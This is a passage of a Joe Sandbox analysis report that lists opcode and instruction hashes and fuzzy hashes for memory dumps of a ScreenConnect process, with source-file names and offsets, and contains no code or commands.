                                                                                                                          • Instruction ID: a3db14a9dc4b58bbb97184865682c1caa5b59d9e0155d5d7026731cb5cf5571a
                                                                                                                          • Opcode Fuzzy Hash: f8f2b6bb2a30711554d66230463c310659f1010e86006f5f85b5eb034cc98c93
                                                                                                                          • Instruction Fuzzy Hash: 4221A471A002115BD700E76898916ADBBA2FFC5210F408525D605EB395DA70AE0AC7D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 34dd83434297eb21916ee8dc9aeddc5bb27b57c01ddd1a7969a66317d0c087ea
                                                                                                                          • Instruction ID: 5cf265d3e424a388ecdc56a77e6631500806db6855a028c1ef3b33106c1449c0
                                                                                                                          • Opcode Fuzzy Hash: 34dd83434297eb21916ee8dc9aeddc5bb27b57c01ddd1a7969a66317d0c087ea
                                                                                                                          • Instruction Fuzzy Hash: C6215E71B006199FCB00DF68D8819AEB7F5FF88311B008529E509DB715EB31AD068B90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b78cac36765c157f6cbfe53c80ca5d3c45e3fb190851b578cee643d22f06fdd2
                                                                                                                          • Instruction ID: 6e9d61b59bfdf2a10dd6e85819cb5af2129d6333a597039d38d125426bd26f44
                                                                                                                          • Opcode Fuzzy Hash: b78cac36765c157f6cbfe53c80ca5d3c45e3fb190851b578cee643d22f06fdd2
                                                                                                                          • Instruction Fuzzy Hash: 6E217A30600705CFD730CF2AC84459ABBF5EF84361F108A2CE493976A0DB32A94ACF90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2ba0a2aabbb1784db9a7c1e1a2c53a3af4aa827034162c4cee02646c74e7e57a
                                                                                                                          • Instruction ID: 88aa5ed9fd7374bc9eeb115e7b334c88fa697f94740d93a51b10ef04142647f5
                                                                                                                          • Opcode Fuzzy Hash: 2ba0a2aabbb1784db9a7c1e1a2c53a3af4aa827034162c4cee02646c74e7e57a
                                                                                                                          • Instruction Fuzzy Hash: 0C2145B6C00249DFDB10CF9AD844ADEBBF5FB88310F148429E929A7201C339A555DFA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f50ed88fc97d8a291cab03ba151d8e5fa53ebd82e95559d5426eef70f6a5cdf9
                                                                                                                          • Instruction ID: f93f0e2cee54b271c7c0642d1888a9413d2a1df7835a0a3a3383f44fe12bbdea
                                                                                                                          • Opcode Fuzzy Hash: f50ed88fc97d8a291cab03ba151d8e5fa53ebd82e95559d5426eef70f6a5cdf9
                                                                                                                          • Instruction Fuzzy Hash: E9212F70A01701CFDB24DF39D444A6ABBF5FF48310B108A6CD4AA97694E735E901CF80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8d69a0efc13477d673184f1309030ab30cc9cabb16bf085dd02b69e14b05f056
                                                                                                                          • Instruction ID: 7c600fe695be09b45777d5672635bc27f9272db977c4a1f7b189bd03f3d1bf8c
                                                                                                                          • Opcode Fuzzy Hash: 8d69a0efc13477d673184f1309030ab30cc9cabb16bf085dd02b69e14b05f056
                                                                                                                          • Instruction Fuzzy Hash: 7C1181717002156BDB00EB68D8816AEB6E2FFC4310F508929D609EB394DF70BE09C7D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 12690a3f679d851162283a108187eb9c8cd03b9634870169f37400ca0ba85f93
                                                                                                                          • Instruction ID: cbf67640b2d3c279e78bbfe24f6ee8fcb41e65238bc17672b3e8bfe5e3744ff7
                                                                                                                          • Opcode Fuzzy Hash: 12690a3f679d851162283a108187eb9c8cd03b9634870169f37400ca0ba85f93
                                                                                                                          • Instruction Fuzzy Hash: 182157B6C00249CFCB11CF99D884ADEBBF6FB88310F148519E929A7211C739A555DFA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d5f239f2745d08981a774df7cd70dca5ea4e77a2f2583c50f650c3204b7e500b
                                                                                                                          • Instruction ID: a8e39127a82b4d3eb811498ad7fa8df769ae1509a7ad2adb1f43f9d9dbb44814
                                                                                                                          • Opcode Fuzzy Hash: d5f239f2745d08981a774df7cd70dca5ea4e77a2f2583c50f650c3204b7e500b
                                                                                                                          • Instruction Fuzzy Hash: 9C113A32B0D3915FC7078B38986019A7FB8EF8211431945EBD405DF313EA329C06CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9eac4d58947c1a0636fc163d2085b3fd21308c42d7a6a23083bac4ff202866bf
                                                                                                                          • Instruction ID: 0bed15e11cc7b3498c24b19f486295e5209e3b841189a06f4b6e091b0b78b816
                                                                                                                          • Opcode Fuzzy Hash: 9eac4d58947c1a0636fc163d2085b3fd21308c42d7a6a23083bac4ff202866bf
                                                                                                                          • Instruction Fuzzy Hash: 78113D71B00619AFCB10DF68D9859AEBBF5FF88311B408529E519AB314EB31BD058F91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d51948a5c40cb6526a8d6066252d53a83a5517bddc7f5a8c858b521fef17309c
                                                                                                                          • Instruction ID: 23908e796bdc2912d507bbcb9c016bd92627c8d6f789d69115d37d8041eeeb4d
                                                                                                                          • Opcode Fuzzy Hash: d51948a5c40cb6526a8d6066252d53a83a5517bddc7f5a8c858b521fef17309c
                                                                                                                          • Instruction Fuzzy Hash: 62211732E10B0A99CB10EFB9D8505EEF7B4EF99310F10C72AD559B7111FB70A2958B81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 110fea5ecaae3c46a858ed3fef78576f410ad064163fef2eaefa0c6c6f202579
                                                                                                                          • Instruction ID: cd570a0acf7bca8c56f7606000a8f203ba824a381a2ff95442bac28babe29a39
                                                                                                                          • Opcode Fuzzy Hash: 110fea5ecaae3c46a858ed3fef78576f410ad064163fef2eaefa0c6c6f202579
                                                                                                                          • Instruction Fuzzy Hash: D311E271700605AFC700DFA8DD818AEBBB1FF84302B008569E5099B315EB31BD06CF91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d36d8db482d1078b671069c99bbf1ee9cbf5ef2da9392f169ff978ec6b2f8e86
                                                                                                                          • Instruction ID: eb0e38083011a4609d6b13da649f10de4ac8849e793452d02e36e3c34dccc9ac
                                                                                                                          • Opcode Fuzzy Hash: d36d8db482d1078b671069c99bbf1ee9cbf5ef2da9392f169ff978ec6b2f8e86
                                                                                                                          • Instruction Fuzzy Hash: 3811287690021A9FCF01DFA8D9805DEBBF1FF49314B108556DA04BB251E771BE0ACB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1cf6c01c1c2ac3d65e22867e5919fd3b8a43b68a079526167e60580990bd3df2
                                                                                                                          • Instruction ID: ecb41fcc92ade1e6d9e5cc74f2e3c3b2196003a5318c62f33d67b3dd0b34f0d4
                                                                                                                          • Opcode Fuzzy Hash: 1cf6c01c1c2ac3d65e22867e5919fd3b8a43b68a079526167e60580990bd3df2
                                                                                                                          • Instruction Fuzzy Hash: 1611C2B2E00204AFDB15CA6CD8405EBBBBAFFC4314B148566D554D7155E3B29A42CB90
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                          • Instruction ID: 972a839634f03eea27a85225f405f291e3c227d99df0d6f6e5098eb894ce2f86
                                                                                                                          • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                          • Instruction Fuzzy Hash: AD11E176504280DFCB02CF54D5C4B96BF72FB84328F24C2A9D8094B257C336D55ACBA2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4bb8ad357a6cfbf0ce3d6e9b28a89c88d7a007208ed0db668f32939c0dca45d3
                                                                                                                          • Instruction ID: 169273d1c503e4804b1aa8dcdaf53a7bbc04a5c800cf1c1fe43545db867a8380
                                                                                                                          • Opcode Fuzzy Hash: 4bb8ad357a6cfbf0ce3d6e9b28a89c88d7a007208ed0db668f32939c0dca45d3
                                                                                                                          • Instruction Fuzzy Hash: F02124B18002099FDB10CF9AC845ADEFBF5EB48320F10842AD519A7241D379A545CFA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 11827ef591e51a9c97d367efbeb7206cca277b018a30fd80cf348996bd419df8
                                                                                                                          • Instruction ID: 71a50f27e8ade79103883fb5f8cf184fc0d520bbfc328da07024ea07316130f8
                                                                                                                          • Opcode Fuzzy Hash: 11827ef591e51a9c97d367efbeb7206cca277b018a30fd80cf348996bd419df8
                                                                                                                          • Instruction Fuzzy Hash: 44012C7A3041109F8708EAADF49496EB3AAFBDD265354853BE509C7355CA32AC038764
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 98745470a1f1d3c006e7df24ff561096c6907225dff6a5ce56db29c16c59189c
                                                                                                                          • Instruction ID: 603a84f6bdae6389b1314a70f2e69d516d2b521c224cdf1d7acdc91371a0bef3
                                                                                                                          • Opcode Fuzzy Hash: 98745470a1f1d3c006e7df24ff561096c6907225dff6a5ce56db29c16c59189c
                                                                                                                          • Instruction Fuzzy Hash: 031161B1E40209AFDB14CA6DC800AABB7FAFFC4314F14C566D614D7254E7B29A02CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0b4dfb87311e56d2fa838c3e238cdf175c062ee687ca76745782a16f2a75d280
                                                                                                                          • Instruction ID: 59855100f8f320fceb44e687e65af74c666cbf166b009fdb30db893da837cf7f
                                                                                                                          • Opcode Fuzzy Hash: 0b4dfb87311e56d2fa838c3e238cdf175c062ee687ca76745782a16f2a75d280
                                                                                                                          • Instruction Fuzzy Hash: 291115B1E0021D9FDF14DBA9D860AEDBBB5EF89310F000469D046BB3A0DB792D44CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 39c43b5fa80a185955b4ab32afb5e2ffc2b32c2cdd1c95bc8d731c7caf25777f
                                                                                                                          • Instruction ID: dfe3507248d8f39f00597462cc7b645457f7d7a9de53605d707e4cb28efff713
                                                                                                                          • Opcode Fuzzy Hash: 39c43b5fa80a185955b4ab32afb5e2ffc2b32c2cdd1c95bc8d731c7caf25777f
                                                                                                                          • Instruction Fuzzy Hash: 2D012D71709390AFC7139B7DAD6055A7FB9EF876103088497E554CB263DA21AC04CBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: efe7bf51ddc75f3c3a84aa8d0e829d007ec1e79d789894cf2ff823749359ccfd
                                                                                                                          • Instruction ID: c1c9cef96a9c69baee148b67d57e76f2ee1f449fe34b1c1c0aae6398c1d28e4b
                                                                                                                          • Opcode Fuzzy Hash: efe7bf51ddc75f3c3a84aa8d0e829d007ec1e79d789894cf2ff823749359ccfd
                                                                                                                          • Instruction Fuzzy Hash: B111127690020A9FCF00DFA8D9809DEBBF5FF49314B508569D609BB251D771BE0ACB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8cc0b9704a6907f3052226255fe8ac7292b229c3d71ba8d4efd32ee2818a72bd
                                                                                                                          • Instruction ID: 0e6404daeb8cdcd27966f70aace82afae65ee59ef799d6e342c599d76b355fbb
                                                                                                                          • Opcode Fuzzy Hash: 8cc0b9704a6907f3052226255fe8ac7292b229c3d71ba8d4efd32ee2818a72bd
                                                                                                                          • Instruction Fuzzy Hash: B4016D7100D380AFD7134B298C84652BFA4EF57224F1985CBE988CF2A3C2695C45C772
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8858aef28b66ad30b4ce3a42045159532f2334f1c7f320cd27375226cde029a8
                                                                                                                          • Instruction ID: d751f52b6bcd77c776c0b08628abccaf5307a72d5d6e5a82ffc72e3a8c3ab5f5
                                                                                                                          • Opcode Fuzzy Hash: 8858aef28b66ad30b4ce3a42045159532f2334f1c7f320cd27375226cde029a8
                                                                                                                          • Instruction Fuzzy Hash: 2F110C71E002198FEF18DBA8D451ADDBBB2AB49310F104469D042BB3A0DE796D45CBA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 842f45c046165109616a5cf4e5919332dd629c6564ec4fa6eacc20886e3b801e
                                                                                                                          • Instruction ID: 4a4e789bbebb0bf80605569b7d692fc565539406e00c4b73c471c3c5ebdb9a0d
                                                                                                                          • Opcode Fuzzy Hash: 842f45c046165109616a5cf4e5919332dd629c6564ec4fa6eacc20886e3b801e
                                                                                                                          • Instruction Fuzzy Hash: 65014E72F043219B8B199E5D981005FB7DDFBC82103144A6AD406DB305EF72DC028FC0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932157013.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_18bd000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: acce195b3142bd84966458318d2f5d0794fbdb4a72b3d06374fe6a17bab69b1e
                                                                                                                          • Instruction ID: 86d84eee6ce1e2e85493db6ea9be475cb58b49e0c0debb8eee5c01cf262c7fb1
                                                                                                                          • Opcode Fuzzy Hash: acce195b3142bd84966458318d2f5d0794fbdb4a72b3d06374fe6a17bab69b1e
                                                                                                                          • Instruction Fuzzy Hash: 1701F771004344AAE7218A59CCC4BA6BFD8EF553A9F08C619ED0D8B383C2799942C6B1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: effe8712caba1c5e43a4c9ffbf15a214f47cc3dd3c3bf275f0f55ded9c79dc72
                                                                                                                          • Instruction ID: aec4d17e68543cf965813db98841de3a6c877e7d1cb2ef4b50aacc09459f9ac1
                                                                                                                          • Opcode Fuzzy Hash: effe8712caba1c5e43a4c9ffbf15a214f47cc3dd3c3bf275f0f55ded9c79dc72
                                                                                                                          • Instruction Fuzzy Hash: 33015A72A0021EDFCB05DBA8D4449ECBFB2FF45355B48C558E009AB115C732ED46CB50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a8d42a5b9dc1d79fc4beef04659d70011ba76912f8fa1ca1beaf2c82cacab6ba
                                                                                                                          • Instruction ID: f98abc7ed17f08783b84cf0991f9e973e08273a4ee7704f8d3fd29949ed90705
                                                                                                                          • Opcode Fuzzy Hash: a8d42a5b9dc1d79fc4beef04659d70011ba76912f8fa1ca1beaf2c82cacab6ba
                                                                                                                          • Instruction Fuzzy Hash: 5601E832D0025A9BCB04DFA9D8448CDBBB6FF89324F45856AE505B7250DB31791ACBA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a7382b5b394c23ff22735eef957169f8b8c4f9349599d88191845532c44c396
                                                                                                                          • Instruction ID: 825a3ba187fe615add3360ddf2ff51c8319b0b1e05cd3b8af319fb28154a9e37
                                                                                                                          • Opcode Fuzzy Hash: 7a7382b5b394c23ff22735eef957169f8b8c4f9349599d88191845532c44c396
                                                                                                                          • Instruction Fuzzy Hash: 48F02B773042156FDF069FA8E8505DE3BBBFB88360B04402AEA09D7251DB329D16C7A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f25e8c365392919d0f4bac14f606ea745a24530102014cacc6f5f92a3d6dba49
                                                                                                                          • Instruction ID: 8eba12f127bc654e5fa960e86133c6625357c3e174a9a776f3f1a31664d3a7a6
                                                                                                                          • Opcode Fuzzy Hash: f25e8c365392919d0f4bac14f606ea745a24530102014cacc6f5f92a3d6dba49
                                                                                                                          • Instruction Fuzzy Hash: EFF05836B092149ED728CABEA40069BBBDECBC4624B14807FE58DC3640E832A4018765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5779d22dd74ab51f046e4ff1cf0baac4d0a61b30583ce965514ae20ae23650c9
                                                                                                                          • Instruction ID: 3941109753150e9c75f7d8a699d3318069bdc0c4163d6076f6d74413b6ff2f46
                                                                                                                          • Opcode Fuzzy Hash: 5779d22dd74ab51f046e4ff1cf0baac4d0a61b30583ce965514ae20ae23650c9
                                                                                                                          • Instruction Fuzzy Hash: 6DF0B477B042486FDB05CA0AD800D5ABFAAEF95220B18C16BE848CB242D531D9128764
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e4c07383ea9f0361d2881e12b5713f2e8b1a354635ce53cfa2a5c652117d7be2
                                                                                                                          • Instruction ID: 93f3924bebf62fc5c82a12c21658c8242ba7b1e8c4d47d122dffe067d00a2366
                                                                                                                          • Opcode Fuzzy Hash: e4c07383ea9f0361d2881e12b5713f2e8b1a354635ce53cfa2a5c652117d7be2
                                                                                                                          • Instruction Fuzzy Hash: 0CF082763002197B9F059E98AC409EF3BAFEBC8360B004029FA09D3350DB729D159BA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a47ddc847d7b02557590cf4ef6075c658f79b31e8e453652a0920e9303176ef3
                                                                                                                          • Instruction ID: eda82b52de0165bb92d42191ddd182cb47113ec67a9f18ba08dca02539e89861
                                                                                                                          • Opcode Fuzzy Hash: a47ddc847d7b02557590cf4ef6075c658f79b31e8e453652a0920e9303176ef3
                                                                                                                          • Instruction Fuzzy Hash: 35F0F975A002599FCB41DFADD4816DDFFF1EB89220714C259E915AB251E731AA03CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4f4287b9eaaa51d0c3e4fafcbcbb3f7ae5c9aee18ba4393d38eddf73819a779c
                                                                                                                          • Instruction ID: ff3d2b62b5190d48219d48fd8e0aa2a4b920dae0e450071e09f9593b8ade6556
                                                                                                                          • Opcode Fuzzy Hash: 4f4287b9eaaa51d0c3e4fafcbcbb3f7ae5c9aee18ba4393d38eddf73819a779c
                                                                                                                          • Instruction Fuzzy Hash: 2BF02B6250D3900FD312D77CBC511D93FE0FEE221574809CBE085CB556D656AA0BC391
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
